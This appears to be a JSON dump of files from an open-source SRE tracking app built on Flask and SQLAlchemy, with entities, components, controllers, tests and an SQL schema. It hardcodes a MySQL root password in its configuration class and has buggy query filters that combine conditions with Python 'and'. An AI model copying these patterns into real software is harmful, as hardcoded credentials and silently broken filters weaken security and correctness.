self._build_connection()\n cursor = db.cursor()\n cursor.execute(\"SELECT {} FROM {} where {}=%s\".format(\n \",\".join(frame.get_metadata()),\n frame.get_schema(), frame.get_metadata()[0]),\n [key]\n )\n frame.load_data(list(cursor))\n finally:\n if db:\n db.close()\n if cursor:\n cursor.close()\n\n return frame\n\n def _delete_one(self, frame, key):\n try:\n db = self._build_connection()\n cursor = db.cursor()\n cursor.execute(\"delete FROM {} where {}=%s\".format(\n frame.get_schema(), frame.get_metadata()[0]), [key]\n )\n frame.load_data(list(cursor))\n finally:\n if db:\n db.close()\n if cursor:\n cursor.close()\n\n return frame\n\n"
},
{
"alpha_fraction": 0.6959459185600281,
"alphanum_fraction": 0.6959459185600281,
"avg_line_length": 26.25,
"blob_id": "f820bf1b03ec550c17b4d6db8c1a4602289f9bdc",
"content_id": "3bbef318ca99998bab519117f32e2b0fde9f91f5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 16,
"path": "/testing/component_test/test_squad_component.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.components.SquadsComponent import SquadsComponent\nfrom testing.DataSeed import DataSeed\n\n\nclass TestSquadComponent(unittest.TestCase):\n\n def setUp(self):\n self.component = SquadsComponent()\n\n def test_maintenance(self):\n name = DataSeed.generate_name(\"squad{}\")\n self.component.create({\"name\": name})\n entity = self.component.get_by_name(name)\n self.assertTrue(entity)\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6647727489471436,
"alphanum_fraction": 0.6647727489471436,
"avg_line_length": 26.959999084472656,
"blob_id": "3dd060da6a78694b4bbb57769497ba765de48c28",
"content_id": "e08009049e191dfbd6d4b6f47263802af576bf5a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 704,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 25,
"path": "/app/repositories/UsersRepository.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.core.UserEntity import UserEntity\nfrom app.core.UsersFrame import UsersFrame\nfrom app.repositories.BaseRepository import BaseRepository\nfrom app.repositories.database import db_session\n\n\nclass UsersRepository(BaseRepository):\n def __init__(self, configuration):\n super().__init__(configuration)\n\n def list(self):\n frame = UsersFrame()\n return self._list(frame)\n\n def create(self, user: UserEntity):\n db_session.add(user)\n db_session.commit()\n\n def get_one(self, key):\n frame = UsersFrame()\n return self._get_one(frame, key)\n\n def delete_one(self, key):\n frame = UsersFrame()\n return self._delete_one(frame, key)\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6845238208770752,
"alphanum_fraction": 0.6904761791229248,
"avg_line_length": 26.94444465637207,
"blob_id": "84637b1d4d259d91e0a6de8108c69fb9a3976ac7",
"content_id": "1149c34fe68e955b258dbd859b6f1186bf6aad85",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 18,
"path": "/app/core/FeatureEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass FeatureEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Features\"\n\n name = Column(String(256), nullable=False, unique=False)\n product_id = Column(Integer, ForeignKey('Products.id'))\n\n def __init__(self, name=None):\n super().__init__()\n self.name = name\n\n def _read_fields(self):\n return FeatureEntity.id.name\n\n"
},
{
"alpha_fraction": 0.6499999761581421,
"alphanum_fraction": 0.6583333611488342,
"avg_line_length": 13.875,
"blob_id": "3bebf1dfa356d1e769f7463e8d8d1fe53ca541cc",
"content_id": "257cb295f494fd3521ea00627013588e2d1b3951",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 8,
"path": "/testing/DataSeed.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import uuid\n\n\nclass DataSeed:\n\n @staticmethod\n def generate_name(seed):\n return seed.format(uuid.uuid4())\n\n"
},
{
"alpha_fraction": 0.635064959526062,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 20.94285774230957,
"blob_id": "3227b3e4494c5eb69dbe13172cc98f7e580ac555",
"content_id": "114e7e282c598ec5fc1cd8f9c55c3d0b7912384d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 770,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 35,
"path": "/testing/component_test/test_users_component.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom app.components.UsersComponent import UsersComponent\nfrom testing.DataSeed import DataSeed\n\n\nclass TestUsersComponent(unittest.TestCase):\n\n def setUp(self):\n self.component = UsersComponent()\n\n def test_maintenance(self):\n\n email = DataSeed.generate_name(\"account{}@email.com\")\n\n self.component.create({\"email\": email})\n\n users = self.component.list()\n\n self.assertTrue(users)\n\n user = self.component.get(users[0][\"id\"])\n\n user[\"email\"] = \"change\"\n\n self.component.update(user)\n\n user = self.component.get(user[\"id\"])\n\n self.assertEqual(user[\"email\"], \"change\")\n\n self.component.delete(user[\"id\"])\n\n user = self.component.get(user[\"id\"])\n\n self.assertFalse(user)\n\n\n"
},
{
"alpha_fraction": 0.6753246784210205,
"alphanum_fraction": 0.6753246784210205,
"avg_line_length": 35.235294342041016,
"blob_id": "96dab07392f889d63c0525ee6654bf9ed2823bfc",
"content_id": "2b1f130a786f24fa976b347020a3ac480ca5e2d1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 616,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 17,
"path": "/app/components/SubscriptionsComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.SubscriptionEntity import SubscriptionEntity\n\n\nclass SubscriptionsComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return SubscriptionEntity()\n\n def get_by_customer_user(self, customer_id, user_id):\n item = SubscriptionEntity.query.filter(SubscriptionEntity.customer_id == customer_id and\n SubscriptionEntity.user_id == user_id).first()\n return item.to_dict()\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7412280440330505,
"avg_line_length": 24.22222137451172,
"blob_id": "6d85f6257374b00fd4afe433de83ae0fe3a21f2a",
"content_id": "ace276ee5ba17617c8e88121774786decaa2f388",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 228,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 9,
"path": "/unittest.bash",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\npython3 -m unittest discover testing/unittest\n\ncoverage run -m unittest discover -s testing/unittest\n\ncoverage report -m --omit=\"*/test*\"\n\ncoverage html --omit=\"*/test*\" -d reports/unittest_coverage_report\n\n"
},
{
"alpha_fraction": 0.6500711441040039,
"alphanum_fraction": 0.670697033405304,
"avg_line_length": 19.39130401611328,
"blob_id": "1f3851e4f1325e717291099ad1f13354b0c2bc89",
"content_id": "125cb4179c2e17a71f97558c512c6dd7ae1b9f3b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1406,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 69,
"path": "/database/sql/V1_1__Initial_Setup.sql",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "create table Users(\n user_id int not null AUTO_INCREMENT,\n email varchar(512),\n PRIMARY KEY(user_id)\n);\n\ninsert into Users(email) values('[email protected]');\n\ncreate table Customers(\n customer_id int,\n name varchar(256),\n PRIMARY KEY(customer_id)\n);\n\ncreate table CustomersUsers(\n customer_user_id int,\n customer_id int,\n user_id int,\n PRIMARY KEY(customer_user_id)\n);\n\ncreate table Products(\n product_id int,\n customer_id int,\n name varchar(256),\n PRIMARY KEY(product_id),\n FOREIGN KEY(customer_id) REFERENCES Customers(customer_id)\n);\n\ncreate table Services(\n service_id int,\n product_id int,\n name varchar(256),\n PRIMARY KEY(service_id),\n FOREIGN KEY(product_id)REFERENCES Products(product_id)\n);\n\ncreate table Squads(\n squad_id int,\n customer_id int,\n name varchar(256),\n PRIMARY KEY(squad_id),\n FOREIGN KEY(customer_id) REFERENCES Customers(customer_id)\n);\n\ncreate table Features(\n feature_id int,\n name varchar(256),\n PRIMARY KEY(feature_id)\n);\n\ncreate table Sources(\n source_id int,\n name varchar(256),\n good_definition varchar(2024),\n total_definition varchar(2024),\n PRIMARY KEY(source_id)\n);\n\ncreate table Events(\n event_id int,\n source_id int,\n good int,\n total int,\n start_date DATE,\n end_date DATE,\n PRIMARY KEY(event_id),\n FOREIGN KEY(source_id) REFERENCES Sources(source_id)\n);"
},
{
"alpha_fraction": 0.6133333444595337,
"alphanum_fraction": 0.6355555653572083,
"avg_line_length": 25.41176414489746,
"blob_id": "20211b4ef221a2cc8c490f854f05950cc92a7388",
"content_id": "23aa405f9ccc2a484d84e7d6b60b271e517caf3b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 17,
"path": "/testing/system_test/test_customers_api.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nimport requests\n\n\nclass TestCustomersApi(unittest.TestCase):\n\n def setUp(self):\n self.url = \"http://localhost:5000\"\n\n def test_maintenance(self):\n response = requests.get(self.url + \"/customers\")\n self.assertEqual(200, response.status_code)\n\n response = requests.post(self.url + \"/customers\", json={\n \"name\": \"customer_test\"\n })\n self.assertEqual(200, response.status_code)\n\n"
},
{
"alpha_fraction": 0.6542056202888489,
"alphanum_fraction": 0.6542056202888489,
"avg_line_length": 15.894737243652344,
"blob_id": "d706aaf98e51c1106277f9bac122e0d38b2e35ce",
"content_id": "699814f905b331037b5512613290e0648b79ea49",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 321,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 19,
"path": "/app/core/BaseFrame.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from typing import abstractmethod\n\n\nclass BaseFrame:\n\n def __init__(self):\n pass\n\n @abstractmethod\n def get_metadata(self): pass\n\n @abstractmethod\n def get_schema(self): pass\n\n @abstractmethod\n def load_data(self, data): pass\n\n @abstractmethod\n def to_dict(self, orient=\"records\"): pass\n"
},
{
"alpha_fraction": 0.6494117379188538,
"alphanum_fraction": 0.6494117379188538,
"avg_line_length": 21.3157901763916,
"blob_id": "1071c0b47056a42c5dcce3c1d78d0120af8f4393",
"content_id": "863b1c0186f4bbd27f5926dac208f2ce15650330",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 19,
"path": "/app/repositories/EntityRepository.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.core.BaseEntity import BaseEntity\nfrom app.repositories.database import db_session\n\n\nclass EntityRepository:\n\n def __init__(self):\n pass\n\n def create(self, data: BaseEntity):\n db_session.add(data)\n db_session.commit()\n\n def delete(self, data: BaseEntity):\n db_session.delete(data)\n db_session.commit()\n\n def update(self, data: BaseEntity):\n db_session.commit()\n\n"
},
{
"alpha_fraction": 0.6089324355125427,
"alphanum_fraction": 0.6187363862991333,
"avg_line_length": 29.366666793823242,
"blob_id": "820dcfbe87cda5f36a41411c95bf3da27bca5082",
"content_id": "a6bd1f0f2d1b2014076433fa3946477c4956b746",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 918,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 30,
"path": "/testing/unittest/test_customer_entity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.core.CustomerEntity import CustomerEntity\nfrom app.core.UserEntity import UserEntity\n\n\nclass TestCustomerEntity(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_maintenance(self):\n entity = CustomerEntity()\n entity.from_dict({\"id\": 123, \"name\": \"[email protected]\"}, force=True)\n self.assertEqual(entity.name, \"[email protected]\")\n self.assertEqual(entity.id, 123)\n\n def test_from_dict_detect(self):\n entity = CustomerEntity()\n self.assertRaises(ValueError,\n lambda: entity.from_dict({\"id\": 123, \"email\": \"[email protected]\"}, force=True))\n\n def test_validate_avatar(self):\n entity = CustomerEntity()\n entity.create(\"email@test\")\n\n def test_validate_name_none(self):\n entity = CustomerEntity()\n self.assertRaises(ValueError,\n lambda: entity.create(None, avatar=\"\"))\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6520916819572449,
"alphanum_fraction": 0.653509795665741,
"avg_line_length": 41.45454406738281,
"blob_id": "fb214a61e2d3c5911fda22228455b1363f405a02",
"content_id": "695aaa6e0461e76c61071ca51f2a0be3916e134e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4231,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 99,
"path": "/testing/manual_test/test_owlvey_basic.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nimport itertools\nimport os\nfrom app.components.CustomersComponent import CustomersComponent\nfrom app.components.FeaturesComponent import FeaturesComponent\nfrom app.components.ProductsComponent import ProductsComponent\nfrom app.components.ServicesComponent import ServicesComponent\nfrom app.components.SquadsComponent import SquadsComponent\nfrom app.components.SubscriptionsComponent import SubscriptionsComponent\nfrom app.components.UsersComponent import UsersComponent\n\n\nclass TestOwlveyBasic(unittest.TestCase):\n\n def setUp(self):\n self.current_dir = os.getcwd()\n\n def build_squads(self):\n squads = [\"naboo\", \"coruscant\"]\n squad_component = SquadsComponent()\n for squad in squads:\n squad_component.create({\"name\": squad})\n\n def test_maintenance(self):\n\n customer_component = CustomersComponent()\n customers = [\"bcp\", \"jpmorgan\", \"scotiabank\"]\n\n for customer in customers:\n customer_component.create({\"name\": customer})\n\n users = [\"[email protected]\", \"[email protected]\", \"[email protected]\"]\n\n users_component = UsersComponent()\n for user in users:\n users_component.create({\"email\": user})\n\n items = itertools.product(customers, users)\n\n subscription_component = SubscriptionsComponent()\n\n for item in list(items):\n tmp_customer = customer_component.get_by_name(item[0])\n tmp_user = users_component.get_by_email(item[1])\n subscription_component.create(\n {\n \"user_id\": tmp_user[\"id\"],\n \"customer_id\": tmp_customer[\"id\"]\n }\n )\n\n self.build_squads()\n\n products = [\"blue\", \"yellow\", \"red\"]\n product_component = ProductsComponent()\n\n items = list(itertools.product(customers, products))\n\n for item in list(items):\n tmp_customer = customer_component.get_by_name(item[0])\n product_component.create({\"name\": item[1], \"customer_id\": tmp_customer[\"id\"]})\n\n services = [\"registration\", \"payments\", \"loans\", \"campaigns\"]\n\n service_component = ServicesComponent()\n feature_component = FeaturesComponent()\n\n features = [\"otp\", \"login\", \"search account\", \"make payment\", \"rapid cash\"]\n\n for item in items:\n tmp_customer = customer_component.get_by_name(item[0])\n tmp_product = product_component.get_by_customer_id_name(tmp_customer[\"id\"], item[1])\n for service in services:\n service_component.create({\"name\": service, \"product_id\": tmp_product[\"id\"]})\n\n for feature in features:\n feature_component.create({\"name\": feature, \"product_id\": tmp_product[\"id\"]})\n\n registration_service = service_component.get_by_name(\"registration\")\n payment_service = service_component.get_by_name(\"payments\")\n campaigns_service = service_component.get_by_name(\"campaigns\")\n\n otp_feature = feature_component.get_by_name(\"otp\")\n login_feature = feature_component.get_by_name(\"login\")\n search_feature = feature_component.get_by_name(\"search account\")\n make_payment_feature = feature_component.get_by_name(\"make payment\")\n rapid_cash_feature = feature_component.get_by_name(\"rapid cash\")\n\n service_component.register_feature(registration_service[\"id\"], otp_feature[\"id\"])\n service_component.register_feature(registration_service[\"id\"], login_feature[\"id\"])\n service_component.register_feature(payment_service[\"id\"], otp_feature[\"id\"])\n service_component.register_feature(payment_service[\"id\"], login_feature[\"id\"])\n service_component.register_feature(payment_service[\"id\"], search_feature[\"id\"])\n service_component.register_feature(payment_service[\"id\"], 
make_payment_feature[\"id\"])\n\n service_component.register_feature(campaigns_service[\"id\"], otp_feature[\"id\"])\n service_component.register_feature(campaigns_service[\"id\"], login_feature[\"id\"])\n service_component.register_feature(campaigns_service[\"id\"], search_feature[\"id\"])\n service_component.register_feature(campaigns_service[\"id\"], rapid_cash_feature[\"id\"])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.4540901482105255,
"alphanum_fraction": 0.4540901482105255,
"avg_line_length": 32.27777862548828,
"blob_id": "07134b9fad790e564a4b218512652d992340bc25",
"content_id": "dc87db77e504f89ef3083c894bac97335a045121",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 599,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 18,
"path": "/app/components/ConfigurationComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import os\n\n\nclass ConfigurationComponent:\n def __init__(self):\n self.db_username = \"root\"\n self.db_password = \"p@ssw0rd\"\n self.db_name = \"sredb\"\n self.db_host = \"localhost\"\n\n def get_environment(self):\n return os.environ.get(\"environment\") or None\n\n def build_db_connection(self):\n return 'mysql+pymysql://{}:{}@{}/{}'.format(self.db_username,\n self.db_password,\n self.db_host,\n self.db_name)\n"
},
{
"alpha_fraction": 0.7571428418159485,
"alphanum_fraction": 0.7571428418159485,
"avg_line_length": 36.4878044128418,
"blob_id": "aa497db97d75b8013277e73faa2c79e3a807502f",
"content_id": "c9a054c824ad1bf86b171383e5bda6ae2ede071c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1540,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 41,
"path": "/app/repositories/database.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import threading\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom app.core.QueryEntity import QueryEntity\nfrom app.components.ConfigurationComponent import ConfigurationComponent\n\n# add reference to register automatic creation\n\nfrom app.core.UserEntity import UserEntity\nfrom app.core.CustomerEntity import CustomerEntity\nfrom app.core.SubscriptionEntity import SubscriptionEntity\nfrom app.core.SquadEntity import SquadEntity\nfrom app.core.ProductEntity import ProductEntity\nfrom app.core.FeatureEntity import FeatureEntity\nfrom app.core.ServiceEntity import ServiceEntity\nfrom app.core.ServiceFeatureEntity import ServiceFeatureEntity\n\nconfiguration = ConfigurationComponent()\n\nif configuration.get_environment() == \"prod\":\n engine = create_engine(configuration.build_db_connection(), convert_unicode=True)\nelif configuration.get_environment() == \"dev\":\n engine = create_engine('sqlite:///dev.db')\n QueryEntity.metadata.create_all(bind=engine)\nelif configuration.get_environment() == \"manual\":\n engine = create_engine('sqlite:///manual.db')\n QueryEntity.metadata.create_all(bind=engine)\nelse:\n engine = create_engine('sqlite://')\n QueryEntity.metadata.create_all(bind=engine)\n\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\n\nQueryEntity.query = db_session.query_property()\n\n\ndef db_init():\n QueryEntity.metadata.create_all(bind=engine)\n\n\n\n"
},
{
"alpha_fraction": 0.6622073650360107,
"alphanum_fraction": 0.6789297461509705,
"avg_line_length": 22,
"blob_id": "2cdf8026cc0c548558a90f5a4de977daa2d3bfa5",
"content_id": "8aefa6817131d95e5f5debc0c3fef0666298d0ed",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 897,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 39,
"path": "/app/controllers/SourcesController.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, request, make_response\nfrom app.components.ServicesComponent import ServicesComponent\n\n\napi = Blueprint('sources_api', __name__)\n\ncomponent = ServicesComponent()\n\nurl_prefix = \"/sources\"\n\n\[email protected](url_prefix, methods=[\"GET\"])\ndef list_items():\n return make_response({\"data\": component.list()}, 200)\n\n\[email protected](url_prefix + \"/<key>\", methods=[\"GET\"])\ndef get_item(key):\n return make_response(component.get(key), 200)\n\n\[email protected](url_prefix, methods=[\"POST\"])\ndef create():\n data = request.get_json()\n component.create(data)\n return make_response({}, 200)\n\n\[email protected](url_prefix, methods=[\"PUT\"])\ndef update():\n data = request.get_json()\n result = component.update(data)\n return make_response(result, 200)\n\n\[email protected](url_prefix + \"/<key>\", methods=[\"DELETE\"])\ndef delete(key):\n component.delete(key)\n return make_response({}, 200)\n"
},
{
"alpha_fraction": 0.6614583134651184,
"alphanum_fraction": 0.6614583134651184,
"avg_line_length": 32.882354736328125,
"blob_id": "5767ddcce8f5e9743ce59cb14f354ffc2939ca8a",
"content_id": "c4263f1dcdd7a57c64172c9feaf4cecd253c9651",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 576,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 17,
"path": "/app/components/ProductsComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.ProductEntity import ProductEntity\n\n\nclass ProductsComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return ProductEntity()\n\n def get_by_customer_id_name(self, customer_id, name):\n entity = ProductEntity.query.filter(ProductEntity.customer_id == customer_id\n and ProductEntity.name == name).first()\n return entity.to_dict()\n"
},
{
"alpha_fraction": 0.7377850413322449,
"alphanum_fraction": 0.7377850413322449,
"avg_line_length": 31.157894134521484,
"blob_id": "8f28bca837f65d26ad0a17cabb799164d9e0ff70",
"content_id": "87ef286bd23d9771f89d32e5b104d7c4358d934c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 614,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 19,
"path": "/app/components/ServicesComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.FeatureEntity import FeatureEntity\nfrom app.core.ServiceEntity import ServiceEntity\nfrom app.core.ServiceFeatureEntity import ServiceFeatureEntity\n\n\nclass ServicesComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return ServiceEntity()\n\n def register_feature(self, service_id, feature_id):\n entity = ServiceFeatureEntity()\n entity.create(service_id, feature_id)\n self._repository.create(entity)\n\n\n\n"
},
{
"alpha_fraction": 0.6938160061836243,
"alphanum_fraction": 0.6938160061836243,
"avg_line_length": 27.782608032226562,
"blob_id": "527433904c22525f6fb351a1c1deae3ce807d1c6",
"content_id": "a50bfa6293ffb2957bbf0d0d27b36aa0a713d630",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 663,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 23,
"path": "/app/core/ServiceFeatureEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from threading import Thread\n\nfrom sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass ServiceFeatureEntity(BaseEntity, QueryEntity):\n __tablename__ = \"ServiceFeatures\"\n\n service_id = Column(Integer, ForeignKey('Services.id'))\n feature_id = Column(Integer, ForeignKey('Features.id'))\n\n def __init__(self):\n super().__init__()\n\n def create(self, service_id, feature_id):\n self.service_id = service_id\n self.feature_id = feature_id\n self._validate()\n\n def _read_fields(self):\n return ServiceFeatureEntity.id.name\n\n"
},
{
"alpha_fraction": 0.7678571343421936,
"alphanum_fraction": 0.7767857313156128,
"avg_line_length": 14.857142448425293,
"blob_id": "43b1ebe1b900d1117d02134b1bd860b18fead20c",
"content_id": "9a230accbed2bcb41d109d124caaf00788e426d3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 112,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 7,
"path": "/manualtest.bash",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\nrm manual.db\n\nexport environment=manual\n\npython3 -m unittest discover testing/manual_test\n\n"
},
{
"alpha_fraction": 0.7552238702774048,
"alphanum_fraction": 0.7552238702774048,
"avg_line_length": 46.03571319580078,
"blob_id": "ddab5f97ded38dd7448870a16ee4d2a4f0a5e983",
"content_id": "b533aa230c5d3e47686f8fb5b0daa5109dc96ea0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1340,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 28,
"path": "/testing/component_test/test_services_component.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.components.CustomersComponent import CustomersComponent\nfrom app.components.FeaturesComponent import FeaturesComponent\nfrom app.components.ProductsComponent import ProductsComponent\nfrom app.components.ServicesComponent import ServicesComponent\nfrom testing.DataSeed import DataSeed\nfrom testing.component_test.ComponentDataSeed import ComponentDataSeed\n\n\nclass TestServiceComponent(unittest.TestCase):\n\n def setUp(self):\n self.customer_component = CustomersComponent()\n self.product_component = ProductsComponent()\n self.service_component = ServicesComponent()\n self.feature_component = FeaturesComponent()\n\n def test_maintenance(self):\n name = DataSeed.generate_name(\"service_{}\")\n product = ComponentDataSeed.build_product(self.customer_component, self.product_component)\n self.service_component.create({\"name\": name, \"product_id\": product[\"id\"]})\n\n def test_feature_registration(self):\n product = ComponentDataSeed.build_product(self.customer_component, self.product_component)\n service = ComponentDataSeed.build_service(product, self.service_component)\n feature = ComponentDataSeed.build_feature(product, self.feature_component)\n self.service_component.register_feature(service[\"id\"], feature[\"id\"])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7310126423835754,
"alphanum_fraction": 0.7310126423835754,
"avg_line_length": 25.33333396911621,
"blob_id": "6c6955c7fd7260c71729090fe4f5426eb5c6f78b",
"content_id": "509f3458b6d88153b9879bb5c71ba7d467d097ea",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 316,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 12,
"path": "/app/components/FeaturesComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.FeatureEntity import FeatureEntity\n\n\nclass FeaturesComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return FeatureEntity()\n"
},
{
"alpha_fraction": 0.6932907104492188,
"alphanum_fraction": 0.6932907104492188,
"avg_line_length": 28.761905670166016,
"blob_id": "a1e6f49a743682d02f5a5aa11892a1d71cb74c5a",
"content_id": "5500e40e6e1baf5bec811583fb7d6ecd90673424",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 626,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 21,
"path": "/app/core/JournalEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String, DateTime\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass JournalEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Journals\"\n\n source_id = Column(Integer, ForeignKey('Sources.id'))\n good = Column(Integer, nullable=False)\n total = Column(Integer, nullable=False)\n start = Column(DateTime, nullable=False)\n end = Column(DateTime, nullable=False)\n\n def __init__(self, name=None):\n super().__init__()\n self.name = name\n\n def _read_fields(self):\n return JournalEntity.id.name\n\n"
}
] | 44 |
gjh000777/wskey | https://github.com/gjh000777/wskey | bc8a1957b9036b746f87abcd2c2e0f4ab8399aa7 | c43e4af6591421a3c278c1521d7cb22d236d1fd3 | 6279fb157c00ae1a60212756dac0f21dc5a55430 | refs/heads/main | 2023-07-25T23:03:10.603770 | 2021-09-04T07:29:32 | 2021-09-04T07:29:32 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5414012670516968,
"alphanum_fraction": 0.6050955653190613,
"avg_line_length": 13.272727012634277,
